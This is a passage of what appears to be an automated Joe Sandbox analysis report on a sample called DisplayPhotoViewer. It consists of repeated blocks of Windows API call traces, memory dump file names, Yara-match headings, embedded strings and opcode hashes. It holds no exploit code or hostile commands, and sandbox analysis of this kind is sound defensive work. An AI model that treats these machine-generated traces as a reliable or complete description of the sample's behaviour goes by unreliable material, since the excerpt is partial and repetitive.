• GetEnvironmentStrings.KERNEL32(?,?,?,?,?,?,10705C78), ref: 10709A19
• FreeEnvironmentStringsA.KERNEL32(00000000), ref: 10709A57
Memory Dump Source
• Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
• Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
Similarity
• API ID: EnvironmentStrings$ByteCharFreeMultiWide
• String ID:
• API String ID: 1823725401-0
• Opcode ID: 04a06433da7a5661d946a9a2d22f7ddeb087997fdd988d480bf9e0d9fe1ca1a6
• Instruction ID: bf087d2da379b3c7f6bd605822513a37b1d74adc97f5a37825ed499f1e937abf
• Opcode Fuzzy Hash: 04a06433da7a5661d946a9a2d22f7ddeb087997fdd988d480bf9e0d9fe1ca1a6
• Instruction Fuzzy Hash: C93138F27042A66FD3517F788CC882FB7DCE68B294B12872DF591D3108EA715C40C2A5
APIs
• CreateFileA.KERNEL32(00000001,80000000,?,0000000C,00000001,00000080,00000000,10712291,00000000,00000000), ref: 1070C62E
• GetLastError.KERNEL32 ref: 1070C63A
• GetFileType.KERNEL32(00000000), ref: 1070C64F
• CloseHandle.KERNEL32(00000000), ref: 1070C65A
Strings
Memory Dump Source
• Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
• Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
Similarity
• API ID: File$CloseCreateErrorHandleLastType
• String ID: @$H
• API String ID: 1809617866-104103126
• Opcode ID: e1ed8818d3adc5aaa63c3ae9355367687b34f2b145ab26f15e5b16f31ec09376
• Instruction ID: 5b054b87e5be8c5b0413974341830de54ee908ff4ec83318dcfc05465d114a8b
• Opcode Fuzzy Hash: e1ed8818d3adc5aaa63c3ae9355367687b34f2b145ab26f15e5b16f31ec09376
• Instruction Fuzzy Hash: F28143B5D0438D9BEB108FA4CC857AE7BE0EF073A4F254319F851AB1D8C7B5AA448B51
                                                                                                    APIs
                                                                                                      • Part of subcall function 11071890: InitializeCriticalSection.KERNEL32(111E12A8,218EC38C,1110715D,00000000,00000000,00000000,E8111A9F,11177AA3,000000FF,?,1110681D,0003533B,E0680D75,E8111A9F,00000001,00000000), ref: 110718DE
                                                                                                      • Part of subcall function 11071890: InitializeCriticalSection.KERNEL32(0000000C,?,1110681D,0003533B,E0680D75,E8111A9F,00000001,00000000,218EC38C,00000000,00000001,00000000,00000000,1117F3B8,000000FF), ref: 11071947
                                                                                                      • Part of subcall function 11071890: InitializeCriticalSection.KERNEL32(00000024,?,1110681D,0003533B,E0680D75,E8111A9F,00000001,00000000,218EC38C,00000000,00000001,00000000,00000000,1117F3B8,000000FF), ref: 1107194D
                                                                                                      • Part of subcall function 11071890: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,1110681D,0003533B,E0680D75,E8111A9F,00000001,00000000,218EC38C,00000000,00000001,00000000,00000000), ref: 11071957
                                                                                                      • Part of subcall function 11071890: InitializeCriticalSection.KERNEL32(000004C8,?,1110681D,0003533B,E0680D75,E8111A9F,00000001,00000000,218EC38C,00000000,00000001,00000000,00000000), ref: 110719AC
                                                                                                      • Part of subcall function 11071890: InitializeCriticalSection.KERNEL32(000004F0,?,1110681D,0003533B,E0680D75,E8111A9F,00000001,00000000,218EC38C,00000000,00000001,00000000,00000000), ref: 110719B5
                                                                                                    • LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1105368C
                                                                                                    • GetProcAddress.KERNEL32(00000000,WTSGetActiveConsoleSessionId), ref: 110536D1
                                                                                                    • SetLastError.KERNEL32(00000078), ref: 110536E4
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 110536EF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                     • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CriticalInitializeSection$Library$AddressCreateErrorEventFreeLastLoadProc
                                                                                                    • String ID: Kernel32.dll$WTSGetActiveConsoleSessionId
                                                                                                    • API String ID: 3780373956-3165951319
                                                                                                    • Opcode ID: 2c237f1e948e84f5e5a63c17618d3a706f102ce51b54fd57485bcffacc3d8260
                                                                                                    • Instruction ID: da12c567308467bc0e476183fe291f3eb547be533663a98a39922bd85968d243
                                                                                                    • Opcode Fuzzy Hash: 2c237f1e948e84f5e5a63c17618d3a706f102ce51b54fd57485bcffacc3d8260
                                                                                                    • Instruction Fuzzy Hash: 0C713CB4A01614AFD751CFAAC8C0E9AFBF9FF88314F10859AE9559B315C770A940CF64
                                                                                                    APIs
                                                                                                    • EnterCriticalSection.KERNEL32(?,218EC38C,?,75BF7CB0,75BF7AA0), ref: 110698C5
                                                                                                    • SetEvent.KERNEL32(?,?,00000000,11067950,?,?), ref: 110699A2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                     • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CriticalEnterEventSection
                                                                                                    • String ID: ..\ctl32\Connect.cpp$erased=%d, idata->dead=%d
                                                                                                    • API String ID: 2291802058-2624497655
                                                                                                    • Opcode ID: 2c73080b8ae187453734e022d3194a06985a24616148979f2fe0d8bb3209aada
                                                                                                    • Instruction ID: be5c7bb0868500cb87f8536a09ee6ec79e22c9f8714405e13c9200cbeae849c4
                                                                                                    • Opcode Fuzzy Hash: 2c73080b8ae187453734e022d3194a06985a24616148979f2fe0d8bb3209aada
                                                                                                    • Instruction Fuzzy Hash: 2F71CF74E042869FEB15CF68C484FDDBBF9BB05314F0481D9D41A9B692E770E985CBA0
                                                                                                    APIs
                                                                                                    • _memset.LIBCMT ref: 1101DA21
                                                                                                      • Part of subcall function 1113AEB0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11189A50), ref: 1113AF1D
                                                                                                      • Part of subcall function 1113AEB0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110784B), ref: 1113AF5E
                                                                                                      • Part of subcall function 1113AEB0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1113AFBB
                                                                                                    • SHGetFolderPathA.SHFOLDER(00000000,00000005,00000000,00000000,00000000), ref: 1101DB35
                                                                                                    • GetSaveFileNameA.COMDLG32(?), ref: 1101DB57
                                                                                                    • _fputs.LIBCMT ref: 1101DB83
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                     • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FolderPath$FileName$ModuleSave_fputs_memset
                                                                                                    • String ID: ChatPath$X
                                                                                                    • API String ID: 2661292734-3955712077
                                                                                                    • Opcode ID: d3167b079e66406386662c12e0c41d9d19578075924410e3e495f44888715057
                                                                                                    • Instruction ID: 9e82242c7d8996982157ac8d56a6da1272a34e48fed0dc1194ded13fdbc69b67
                                                                                                    • Opcode Fuzzy Hash: d3167b079e66406386662c12e0c41d9d19578075924410e3e495f44888715057
                                                                                                    • Instruction Fuzzy Hash: 5D51B375D043599FDB21EB60CD88B9EBBB4BF45308F4041D9D9096B280EB75EA44CB90
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                     • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Closewsprintf
                                                                                                    • String ID: "%s"$"%s" %s$%s (%d)$\\.\%u\
                                                                                                    • API String ID: 4060989581-4096285074
                                                                                                    • Opcode ID: 9b754497ad4494505d3cb7def387756ac7962f554211c21d3bb8d9205f62b3f6
                                                                                                    • Instruction ID: ef38fbc228f2a11926dd6cf6f0fea03773ab9401bb016fa2deec54abac17f136
                                                                                                    • Opcode Fuzzy Hash: 9b754497ad4494505d3cb7def387756ac7962f554211c21d3bb8d9205f62b3f6
                                                                                                    • Instruction Fuzzy Hash: 70414BB1E005199BCB15CF64DCD1BEEB3B5AF49304F1045E8EA1997680EB32AE84CF95
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                     • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Closewsprintf
                                                                                                    • String ID: "%s"$"%s" %s$%s (%d)$\\.\%u\
                                                                                                    • API String ID: 4060989581-4096285074
                                                                                                    • Opcode ID: dc631255adf3c089bb2cd2c4de9372626490230deb98f22d80feedb5db77dd48
                                                                                                    • Instruction ID: 4fc9967668331477116f347ba3c21676c3638bd457e48876168c634851661cef
                                                                                                    • Opcode Fuzzy Hash: dc631255adf3c089bb2cd2c4de9372626490230deb98f22d80feedb5db77dd48
                                                                                                    • Instruction Fuzzy Hash: 43412BB1E002199BCB15CF64DCD1BEEB3B5AF49304F1041E8EA1997640EB32AE84CF55
                                                                                                    APIs
                                                                                                      • Part of subcall function 111078A0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,1110859D,00000000,00000001,?,?,?,?,?,1102F5F3), ref: 111078BE
                                                                                                      • Part of subcall function 111077A0: _malloc.LIBCMT ref: 111077B9
                                                                                                      • Part of subcall function 111077A0: wsprintfA.USER32 ref: 111077D4
                                                                                                      • Part of subcall function 111077A0: _memset.LIBCMT ref: 111077F7
                                                                                                    • LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,1117ECB6,000000FF), ref: 110FF743
                                                                                                    • LoadLibraryA.KERNEL32(Advapi32.dll), ref: 110FF78C
                                                                                                    • std::exception::exception.LIBCMT ref: 110FF7EE
                                                                                                    • __CxxThrowException@8.LIBCMT ref: 110FF803
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                     • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad$CreateEventException@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                    • String ID: Advapi32.dll$Wtsapi32.dll
                                                                                                    • API String ID: 2851125068-2390547818
                                                                                                    • Opcode ID: cb8e67688c38ac2871a8d10db1fe04191b0601a259bd1c73357765a7ea03064f
                                                                                                    • Instruction ID: 294511d2743a5f9b06d3c33d4191c482935c74709cac97a834179c0086ff3fe7
                                                                                                    • Opcode Fuzzy Hash: cb8e67688c38ac2871a8d10db1fe04191b0601a259bd1c73357765a7ea03064f
                                                                                                    • Instruction Fuzzy Hash: 7041F1B5C09B449ED761CF6AC980BDAFBE8EFA5604F00491ED5AE93210DB787600CF61
                                                                                                    APIs
                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 1100F966
                                                                                                      • Part of subcall function 11155C90: std::exception::exception.LIBCMT ref: 11155CA5
                                                                                                      • Part of subcall function 11155C90: __CxxThrowException@8.LIBCMT ref: 11155CBA
                                                                                                      • Part of subcall function 11155C90: std::exception::exception.LIBCMT ref: 11155CCB
                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 1100F97C
                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 1100F997
                                                                                                    • _memmove.LIBCMT ref: 1100FA02
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                     • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
                                                                                                    • String ID: invalid string position$string too long
                                                                                                    • API String ID: 443534600-4289949731
                                                                                                    • Opcode ID: bb88493714d86c1132c9a348e76e0b2ab63ff07c92f1ac6bb14338b640528a69
                                                                                                    • Instruction ID: 1eb77cffd938af695757bff06b8df45d918709cb31701de168ea04a508439263
                                                                                                    • Opcode Fuzzy Hash: bb88493714d86c1132c9a348e76e0b2ab63ff07c92f1ac6bb14338b640528a69
                                                                                                    • Instruction Fuzzy Hash: CD31F732B046009FF715DE5CDC80E9EF7EAEBD16A4B10462EF491C7681D770A84187A2
                                                                                                    APIs
                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 1100F879
                                                                                                      • Part of subcall function 11155C90: std::exception::exception.LIBCMT ref: 11155CA5
                                                                                                      • Part of subcall function 11155C90: __CxxThrowException@8.LIBCMT ref: 11155CBA
                                                                                                      • Part of subcall function 11155C90: std::exception::exception.LIBCMT ref: 11155CCB
                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 1100F89A
                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 1100F8B5
                                                                                                    • _memmove.LIBCMT ref: 1100F91D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                     • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
                                                                                                    • String ID: invalid string position$string too long
                                                                                                    • API String ID: 443534600-4289949731
                                                                                                    • Opcode ID: 67551b1c33a973f07bcd07aba3e868078bda846387dde07c3b25198ac87bbad8
                                                                                                    • Instruction ID: 68722e301ae5bf40bc777e56d5d863e1e39730bb403d67601ea891b8e125e259
                                                                                                    • Opcode Fuzzy Hash: 67551b1c33a973f07bcd07aba3e868078bda846387dde07c3b25198ac87bbad8
                                                                                                    • Instruction Fuzzy Hash: BC31F732B006159FE715CE6CE880BAAF7E9EF907A4B10066EE552CB240D770E94097A2
                                                                                                    APIs
                                                                                                    • PlaySoundA.WINMM(1000,50,00000000,00020001), ref: 111397C1
                                                                                                      • Part of subcall function 11159A6A: __isdigit_l.LIBCMT ref: 11159A8F
                                                                                                    • Beep.KERNEL32(00000000,00000000), ref: 11139785
                                                                                                    • MessageBeep.USER32(00000000), ref: 11139797
                                                                                                    • MessageBeep.USER32(-00000010), ref: 111397AB
                                                                                                    • MessageBeep.USER32(00000000), ref: 111397CD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                     • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Beep$Message$PlaySound__isdigit_l
                                                                                                    • String ID: 1000,50
                                                                                                    • API String ID: 3904670044-1941404556
                                                                                                    • Opcode ID: 99152a87e6605a48c587a8d876ab2ca485590b50a652ee5fec0b9c03dcfdc099
                                                                                                    • Instruction ID: 7175f2ac5e4aa87d29df7a8371da3e4a7cc7bd782565aaa9059e1cfd818bc150
                                                                                                    • Opcode Fuzzy Hash: 99152a87e6605a48c587a8d876ab2ca485590b50a652ee5fec0b9c03dcfdc099
                                                                                                    • Instruction Fuzzy Hash: 19214726941A9942E6430DA4ADC4BFEFA5F8BC277AF000070EC68D1488F625D0118B62
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                     • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free$_calloc_malloc
                                                                                                    • String ID: SAMS Teach
                                                                                                    • API String ID: 2764978295-1519287674
                                                                                                    • Opcode ID: bbdfa197d122dddc5e760b1b15feb032d823ef04abfb22b4eb3256f58350d1a2
                                                                                                    • Instruction ID: 9919973bb0d9ea56a1ca0a3536a983dbb7cb4393f3ca263b6c681cfcfb6bc050
                                                                                                    • Opcode Fuzzy Hash: bbdfa197d122dddc5e760b1b15feb032d823ef04abfb22b4eb3256f58350d1a2
                                                                                                    • Instruction Fuzzy Hash: E8214879A00246AFC701DB69CC90FFFFBB8DF46328F000158FC2597280EA35A90582A1
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
